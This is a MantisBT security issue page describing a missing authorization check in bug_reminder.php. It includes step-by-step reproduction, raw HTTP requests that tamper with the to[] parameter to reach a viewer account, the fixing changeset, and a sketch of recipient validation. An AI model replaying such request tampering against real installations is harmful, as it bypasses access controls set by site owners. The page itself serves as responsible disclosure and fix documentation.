View Issue Details

ID: 0027276
Project: mantisbt
Category: security
View Status: public
Last Update: 2020-09-25 14:53
Reporter: d3vpoo1
Assigned To: dregad
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Platform: Windows
OS: Windows
OS Version: Windows 10
Target Version: 2.24.3
Fixed in Version: 2.24.3
Summary: 0027276: Send reminder to viewer
Description

The endpoint bug_reminder.php has a parameter named &to%5B%5D which doesn't seem to have any validation. This allows sending a reminder to a non-admin member.

Steps To Reproduce
  1. Login as your admin account

  2. Go to view.php?id=<SOME_BUG_ID>

  3. You can see a Send a reminder button

  4. Click it

  5. It will redirect to bug_reminder_page.php?bug_id=<SOME_BUG_ID>

  6. Open your intercept

  7. Send it to someone on the list (this list is composed of developer/manager/admin)

You will get this request :

POST /mantisbt2/bug_reminder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/bug_reminder_page.php?bug_id=11
Cookie: MANTIS_collapse_settings=|profile:0; MANTIS_PROJECT_COOKIE=1; MANTIS_VIEW_ALL_COOKIE=2; PHPSESSID=fkhqb98jkjojoog0of5kp9vt2c; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=11%2C10%2C9%2C4%2C7%2C6%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_reminder_token=20200911Akplh5-HUbvUvWpH0OX0RmTxWjMKX3FD&bug_id=11&to%5B%5D=10&bugnote_text=

  8. Change the value of to%5B%5D to your viewer account; in my case my viewer id value is 4

Exploit request

POST /mantisbt2/bug_reminder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/bug_reminder_page.php?bug_id=11
Cookie: MANTIS_collapse_settings=|profile:0; MANTIS_PROJECT_COOKIE=1; MANTIS_VIEW_ALL_COOKIE=2; PHPSESSID=fkhqb98jkjojoog0of5kp9vt2c; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=11%2C10%2C9%2C4%2C7%2C6%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_reminder_token=20200911Akplh5-HUbvUvWpH0OX0RmTxWjMKX3FD&bug_id=11&to%5B%5D=4&bugnote_text=

Exploit response

Additional Information

None

Tags: No tags attached.

Activities

d3vpoo1

2020-09-10 20:39

reporter   ~0064411

I forgot to include the image.

default1.png (11,687 bytes)   
d3vpoo1

2020-09-12 21:46

reporter   ~0064426

Any update on this?

dregad

2020-09-19 07:45

developer   ~0064451

PR https://github.com/mantisbt/mantisbt/pull/1703

Related Changesets

MantisBT: master-2.24 7fc2a11f

2020-09-19 03:43

dregad


Prevent sending reminders to unauthorized users

Adds a check in bug_reminder.php to ensure that all the recipients have
the required access level to receive them (reminder_receive_threshold).

Fixes 0027276

Affected Issues: 0027276
mod - bug_reminder.php
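
The recipient check that the changeset describes, sketched as a self-contained PHP example. This is an added illustration, not the MantisBT patch or project code: the helper validate_reminder_recipients(), the user table, the access-level numbers and the threshold value are assumptions made for the example, with the three sample to[] inputs constructed from the requests in the report.

```php
<?php
declare(strict_types=1);

// Access-level values (assumed for this example; not shown on the page).
const VIEWER = 10;
const DEVELOPER = 55;
const ADMINISTRATOR = 90;

// Assumed threshold standing in for the reminder_receive_threshold option.
const REMINDER_RECEIVE_THRESHOLD = DEVELOPER;

// Constructed user table: user id => access level on the bug's project.
const USERS = [1 => ADMINISTRATOR, 4 => VIEWER, 10 => DEVELOPER];

/**
 * Hypothetical helper: validate the to[] values taken from the POST body.
 * Fails closed: a single disallowed recipient rejects the whole request.
 *
 * @return int[] validated, de-duplicated recipient ids
 */
function validate_reminder_recipients(array $p_to, array $p_users, int $p_threshold): array {
    $t_valid = [];
    foreach ($p_to as $t_raw) {
        // Accept only plain decimal ids; nested arrays, signs and blanks are rejected.
        if ((!is_string($t_raw) && !is_int($t_raw)) || !ctype_digit((string)$t_raw)) {
            throw new InvalidArgumentException('Malformed recipient id');
        }
        $t_id = (int)$t_raw;
        // Unknown ids and ids below the threshold get the same error,
        // so the response does not reveal which user ids exist.
        if (!isset($p_users[$t_id]) || $p_users[$t_id] < $p_threshold) {
            throw new InvalidArgumentException('Recipient not allowed to receive reminders');
        }
        $t_valid[$t_id] = true;
    }
    if ($t_valid === []) {
        throw new InvalidArgumentException('No recipients');
    }
    return array_keys($t_valid);
}

// Constructed inputs: the original request, the modified one, and a mix of both.
foreach ([['10'], ['4'], ['10', '4']] as $t_to) {
    try {
        $t_ids = validate_reminder_recipients($t_to, USERS, REMINDER_RECEIVE_THRESHOLD);
        echo 'to[]=' . implode(',', $t_to) . ' -> send to ' . implode(',', $t_ids) . PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'to[]=' . implode(',', $t_to) . ' -> rejected: ' . $e->getMessage() . PHP_EOL;
    }
}
```

The point of the check is that the recipient list shown on bug_reminder_page.php is only a UI filter; the same threshold has to be enforced again on the submitted to[] values in bug_reminder.php.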